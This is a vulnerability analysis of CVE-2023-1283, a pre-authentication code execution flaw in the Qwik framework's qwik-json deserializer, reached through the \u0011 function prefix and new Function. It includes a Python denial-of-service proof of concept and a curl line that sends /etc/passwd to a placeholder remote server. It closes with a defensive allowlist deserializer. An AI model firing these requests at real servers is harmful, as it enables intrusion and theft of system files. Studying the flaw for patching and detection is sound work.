
ref

https://cve.report/CVE-2023-1283

https://huntr.dev/bounties/63f1ff91-48f3-4886-a179-103f1ddd8ff8/

Background

In services that use Qwik (https://github.com/BuilderIO/qwik), a Node.js-based framework, a pre-authentication remote command execution attack is possible when the Qwik version is 0.20.1 or lower.

Analysis

  • The analysis was carried out against the vulnerable version, 0.20.1.
  • Qwik's middleware request handlers are set up in the following order:
    • POST: securityMiddleware ⇒ pureServerFunction ⇒ fixTrailingSlash ⇒ renderQData
    • GET: fixTrailingSlash ⇒ renderQData
// packages/qwik-city/middleware/request-handler/resolve-request-handlers.ts
var resolveRequestHandlers = (serverPlugins, route, method, renderHandler) => {
  const routeLoaders = [];
  const routeActions = [];
  const requestHandlers = [];
  const isPageRoute = !!(route && isLastModulePageRoute(route[1]));

  if (serverPlugins) {
    _resolveRequestHandlers(
      routeLoaders,
      routeActions,
      requestHandlers,
      serverPlugins,
      isPageRoute,
      method
    );
  }
  if (route) {
    if (isPageRoute) {
      if (method === "POST") {
        requestHandlers.unshift(securityMiddleware);
        requestHandlers.push(pureServerFunction);
      }
      requestHandlers.push(fixTrailingSlash);
      requestHandlers.push(renderQData);
    }
    _resolveRequestHandlers(
      routeLoaders,
      routeActions,
      requestHandlers,
      route[1],
      isPageRoute,
      method
    );
    if (isPageRoute) {
      if (routeLoaders.length + actionsMiddleware.length > 0) {
        requestHandlers.push(actionsMiddleware(routeLoaders, routeActions));
      }
      requestHandlers.push(renderHandler);
    }
  }
  return requestHandlers;
};
  • The securityMiddleware function checks the following condition to prevent CSRF:
    • request.headers.get("origin") == url.origin
function securityMiddleware({ url, request, error }) {
  const forbidden = request.headers.get("origin") !== url.origin;
  if (forbidden) {
    throw error(403, `Cross-site ${request.method} form submissions are forbidden`);
  }
}
  • pureServerFunction runs ev.parseBody once the following conditions hold:
  1. qfunc is defined in the query string
  2. The X-QRL header equals qfunc in the query
  3. Content-Type == application/qwik-json
async function pureServerFunction(ev) {
  const fn = ev.query.get(QFN_KEY); // var QFN_KEY = "qfunc";
  if (fn && ev.request.headers.get("X-QRL") === fn && ev.request.headers.get("Content-Type") === "application/qwik-json") {
    ev.exit();
    const qwikSerializer = ev[RequestEvQwikSerializer];
    const data = await ev.parseBody();
    if (Array.isArray(data)) {
      const [qrl, ...args] = data;
      if (isQrl(qrl) && qrl.getHash() === fn) {
        const result = await qrl.apply(ev, args);
        verifySerializable(qwikSerializer, result, qrl);
        ev.headers.set("Content-Type", "application/qwik-json");
        ev.send(200, await qwikSerializer._serializeData(result, true));
        return;
      }
    }
    throw ev.error(500, "Invalid request");
  }
}
  • In the SSR case this yields a DoS (PoC):
import sys
import requests

host = sys.argv[1]
headers = { "Origin": host, "X-QRL": "1", "Content-Type": "application/qwik-json" }
response = requests.post(f'{host}/q-data.json?qfunc=1', headers=headers)
print(response.text)
  • When the conditions above are met, the following runs inside ev.parseBody():
function createRequestEvent(serverRequestEv, loadedRoute, requestHandlers, trailingSlash = true, basePathname = "/", qwikSerializer, resolved) {
  // skip
  parseBody: async () => {
    if (requestData !== void 0) {
      return requestData;
    }
    return requestData = parseRequest(requestEv.request, sharedMap, qwikSerializer);
  },
  // skip
}

// skip

var parseRequest = async (request, sharedMap, qwikSerializer) => {
  var _a2;
  const req = request.clone();
  const type = ((_a2 = request.headers.get("content-type")) == null ? void 0 : _a2.split(/[;,]/, 1)[0].trim()) ?? "";
  if (type === "application/x-www-form-urlencoded" || type === "multipart/form-data") {
    const formData = await req.formData();
    sharedMap.set(RequestEvSharedActionFormData, formData);
    return formToObj(formData);
  } else if (type === "application/json") {
    const data = await req.json();
    return data;
  } else if (type === "application/qwik-json") {
    return qwikSerializer._deserializeData(await req.text());
  }
  return void 0;
};
  • If requestData is undefined, the request is passed to parseRequest as an argument.
  • Because the content-type is application/qwik-json, qwikSerializer._deserializeData is called.
// qwik/core.mjs
const _deserializeData = (data, element) => {
    const obj = JSON.parse(data);
    if (typeof obj !== 'object') {
        return null;
    }
    const { _objs, _entry } = obj;
    if (typeof _objs === 'undefined' || typeof _entry === 'undefined') {
        return null;
    }
    let doc = {};
    let containerState = {};
    if (element && isQwikElement(element)) {
        const containerEl = getWrappingContainer(element);
        if (containerEl) {
            containerState = _getContainerState(containerEl);
            doc = containerEl.ownerDocument;
        }
    }
    const parser = createParser(containerState, doc);
    reviveValues(_objs, parser);
    const getObject = (id) => _objs[strToInt(id)];
    for (const obj of _objs) {
        reviveNestedObjects(obj, getObject, parser);
    }
    return getObject(_entry);
};
  • This function creates the Parser used for deserialization and calls reviveValues.
  • The Parser has three functions: prepare, subs and fill.
const createParser = (containerState, doc) => {
    const fillMap = new Map();
    const subsMap = new Map();
    return {
        prepare(data) {
            // skip
        },
        subs(obj, subs) {
            // skip
        },
        fill(obj, getObject) {
            // skip
        },
    };
};
  • As shown below, reviveValues calls the parser's prepare function whenever an _objs entry is of type "string" and its value is not "\u0001":
const reviveValues = (objs, parser) => {
    for (let i = 0; i < objs.length; i++) {
        const value = objs[i];
        if (isString(value)) {
            objs[i] = value === UNDEFINED_PREFIX ? undefined : parser.prepare(value); // UNDEFINED_PREFIX = "\u0001"
        }
    }
};
  • prepare uses the first byte of the _objs value as a prefix and looks for the serializer whose prefix matches.
  • If a matching serializer exists, it calls that serializer's prepare function with the value from the second byte onward as the first argument.
prepare(data) {
    for (const s of serializers) {
        const prefix = s.prefix;
        if (data.startsWith(prefix)) {
            const value = s.prepare(data.slice(prefix.length), containerState, doc);
            if (s.fill) {
                fillMap.set(value, s);
            }
            if (s.subs) {
                subsMap.set(value, s);
            }
            return value;
        }
    }
    return data;
}
  • The list of serializers is as follows; each has its own defined prefix value:
// qwik/core.mjs
const serializers = [
    QRLSerializer,
    SignalSerializer,
    SignalWrapperSerializer,
    WatchSerializer,
    ResourceSerializer,
    URLSerializer,
    DateSerializer,
    RegexSerializer,
    ErrorSerializer,
    DocumentSerializer,
    ComponentSerializer,
    PureFunctionSerializer,
    NoFiniteNumberSerializer,
    URLSearchParamsSerializer,
    FormDataSerializer,
];
  • Of these, look at PureFunctionSerializer:
const PureFunctionSerializer = {
    prefix: '\u0011',
    test: (obj) => typeof obj === 'function' && obj.__qwik_serializable__ !== undefined,
    serialize: (obj) => {
        return obj.toString();
    },
    prepare: (data) => {
        const fn = new Function('return ' + data)();
        fn.__qwik_serializable__ = true;
        return fn;
    },
    fill: undefined,
};
  • The prefix is \u0011, and the prepare function runs new Function with the argument value.
  • This allows remote command execution.
    • The exploit is not published; please contact me separately.
    • command
      • curl -F "a=@/etc/passwd" http://[remote_server]
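As an added illustration (not Qwik's code), here is a hardened model of the prefix-dispatch deserializer traced above: string entries in _objs are revived only through an allowlist of data-only serializers, and any other control-character prefix, including the \u0011 PureFunctionSerializer prefix from the page, is reported and rejected before anything is revived; an empty or malformed body (the SSR DoS case above) is reported instead of throwing from JSON.parse. Nested-object revival is left out, and the URL/Date prefix bytes and the base-36 id encoding are assumptions of this model.

```javascript
// Added example, not Qwik code: a hardened model of the prefix-dispatch
// deserializer traced above. Only UNDEFINED_PREFIX and the PureFunctionSerializer
// prefix are taken from the page; the other prefix bytes are constructed.
const UNDEFINED_PREFIX = "\u0001";
const CODE_PREFIX = "\u0011"; // PureFunctionSerializer.prefix on the page

// Allowlist of data-only revivers: nothing here can evaluate code.
const SAFE_SERIALIZERS = [
  { name: "URL", prefix: "\u0005", prepare: (d) => new URL(d) },
  { name: "Date", prefix: "\u0006", prepare: (d) => new Date(d) },
];

const isControlPrefixed = (s) => s.length > 0 && s.charCodeAt(0) < 0x20;

// Report every _objs string whose prefix is outside the allowlist. This only
// inspects the JSON, so it is safe to run on untrusted bodies before reviving.
function screenBody(text) {
  let obj;
  try { obj = JSON.parse(text); } catch { return [{ index: -1, reason: "invalid JSON" }]; }
  if (!obj || typeof obj !== "object" || !Array.isArray(obj._objs)) {
    return [{ index: -1, reason: "malformed envelope" }];
  }
  const findings = [];
  obj._objs.forEach((v, i) => {
    if (typeof v !== "string" || v === UNDEFINED_PREFIX || !isControlPrefixed(v)) return;
    if (!SAFE_SERIALIZERS.some((s) => v.startsWith(s.prefix))) {
      findings.push({ index: i, reason: v[0] === CODE_PREFIX ? "code prefix" : "unknown prefix" });
    }
  });
  return findings;
}

// Revive through the allowlist only. Unknown control prefixes are an error,
// never a fall-through to a reviver that calls new Function.
function safeDeserialize(text) {
  const findings = screenBody(text);
  if (findings.length) throw new Error("rejected: " + JSON.stringify(findings));
  const { _objs, _entry } = JSON.parse(text);
  if (typeof _entry !== "string") throw new Error("rejected: missing _entry");
  const objs = _objs.map((v) => {
    if (typeof v !== "string") return v;
    if (v === UNDEFINED_PREFIX) return undefined;
    const s = SAFE_SERIALIZERS.find((x) => v.startsWith(x.prefix));
    return s ? s.prepare(v.slice(s.prefix.length)) : v;
  });
  return objs[parseInt(_entry, 36)]; // id encoding assumed base 36 in this model
}
```

screenBody can also back a request-logging hook on application/qwik-json POSTs, so rejected prefixes show up in server logs rather than only as a 500.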

Patch
